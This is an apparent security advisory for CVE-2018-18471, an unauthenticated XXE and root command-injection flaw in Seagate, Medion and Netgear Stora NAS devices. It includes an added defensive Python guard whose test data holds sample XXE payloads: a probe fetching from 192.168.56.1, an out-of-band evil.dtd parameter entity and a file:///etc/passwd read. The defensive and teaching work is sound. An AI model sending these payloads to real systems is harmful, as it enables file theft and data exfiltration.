#VU15459 Privilege escalation in NETGEAR products - CVE-2018-18471


Updated: 2018-10-22

Vulnerability identifier: #VU15459

Vulnerability risk: High

CVSSv4.0: 8.1 [CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:U/U:Amber]

CVE-ID: CVE-2018-18471

CWE-ID: CWE-77

Exploitation vector: Network

Exploit availability: No

Vulnerable software:
Seagate GoFlex Home
Hardware solutions / Firmware
Medion LifeCloud NAS
Hardware solutions / Office equipment, IP-phones, print servers
Netgear Stora
Hardware solutions / Office equipment, IP-phones, print servers

Vendors: Seagate, Medion, NETGEAR

Description
The vulnerability allows a remote attacker to compromise a vulnerable system.

The weakness exists because most of the API endpoints and the web interface are reachable without authentication. One REST API endpoint, /api/2.0/rest/aggregator/xml, loads XML supplied in the POST body and hands it to a parser that resolves external entities (XXE). A remote attacker can use this to make the parser issue requests on the device's behalf (the original researchers verified this by having the device fetch the file XXE_CHECK from a host at 192.168.56.1), read local files and recover usernames and passwords, and reach a local daemon that skips over junk data until it finds an expected marker string (shown in an IDA snippet in the original write-up, not reproduced here), which allows injection of arbitrary commands that execute with root privileges.
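
The following is an added example, not code from the advisory, the referenced write-up or any of the vendors. It shows the pre-parse guard that would have closed the XXE step described above: an endpoint that accepts XML in a POST body refuses any document carrying a DOCTYPE (the only place external and parameter entities can be declared) before the body reaches the parser, and it reports the SYSTEM/PUBLIC identifiers so a detection pipeline can log where the parser would have been sent. The endpoint path and the 192.168.56.1/XXE_CHECK probe come from the description above; the request element names, the evil.dtd name and the file path in the sample payloads are constructed for the example.

```python
"""Pre-parse XXE guard for an XML-over-POST endpoint (added example)."""
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies for /api/2.0/rest/aggregator/xml. The element
# names are invented; the real request format is not documented here.
SAFE_BODY = b'<?xml version="1.0"?><request><op>list</op></request>'

# Modelled on the researchers' XXE_CHECK probe: the parser fetches a URL.
PROBE_BODY = (b'<?xml version="1.0"?>'
              b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://192.168.56.1/XXE_CHECK">]>'
              b'<r>&xxe;</r>')

# Out-of-band variant using a parameter entity (evil.dtd is constructed).
OOB_BODY = (b'<?xml version="1.0"?>'
            b"<!DOCTYPE r [<!ENTITY % dtd SYSTEM 'http://192.168.56.1/evil.dtd'> %dtd;]>"
            b'<r/>')

# Classic local file read (file path is a generic illustration).
FILE_BODY = (b'<!DOCTYPE r [<!ENTITY f SYSTEM "file:///etc/passwd">]>'
             b'<r>&f;</r>')

# <!ENTITY name SYSTEM "uri">, <!ENTITY % name SYSTEM 'uri'>,
# <!ENTITY name PUBLIC "pubid" "uri">; either quote style for the URI.
_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?([^\s>]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|\'[^\']*\'))\s+'
    r'(?:"([^"]*)"|\'([^\']*)\')',
    re.IGNORECASE,
)
_DOCTYPE_RE = re.compile(r'<!DOCTYPE\b', re.IGNORECASE)


def external_entities(xml_text):
    """Return [(name, uri, is_parameter_entity)] for every external entity
    declared in the document's DTD. Used for logging, not for allow-listing:
    the guard below rejects the whole DOCTYPE, not just what this finds."""
    found = []
    for m in _ENTITY_RE.finditer(xml_text):
        uri = m.group(3) if m.group(3) is not None else m.group(4)
        found.append((m.group(2), uri, m.group(1) is not None))
    return found


def parse_untrusted_xml(body):
    """Parse a POST body, refusing any DOCTYPE before the parser sees it.

    Rejecting the DOCTYPE blocks external entities (SSRF, file read,
    out-of-band exfiltration via parameter entities) and also internal
    entity expansion attacks such as billion laughs, regardless of how the
    underlying parser is configured. Raises ValueError on rejection."""
    text = body.decode("utf-8", errors="replace")
    if _DOCTYPE_RE.search(text):
        targets = ", ".join(uri for _, uri, _ in external_entities(text)) or "none"
        raise ValueError("DOCTYPE not accepted; external entity targets: " + targets)
    return ET.fromstring(text)


def is_rejected(body):
    """True if the guard refuses the body, False if it parses."""
    try:
        parse_untrusted_xml(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, body in (("safe", SAFE_BODY), ("probe", PROBE_BODY),
                        ("oob", OOB_BODY), ("file", FILE_BODY)):
        print(label, "rejected" if is_rejected(body) else "parsed",
              external_entities(body.decode()))
```

The guard is deliberately a string check that runs before the parser: the unauthenticated endpoint means every caller is untrusted, and refusing the DOCTYPE outright is simpler to verify than auditing each parser's entity-resolution flags on the device's firmware.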

Mitigation
Cybersecurity Help is currently unaware of any solutions addressing the vulnerability.

Vulnerable software versions

Seagate GoFlex Home: All versions

Medion LifeCloud NAS: All versions

Netgear Stora: All versions


External links
https://www.wizcase.com/blog/hack-2018/


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware that exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.
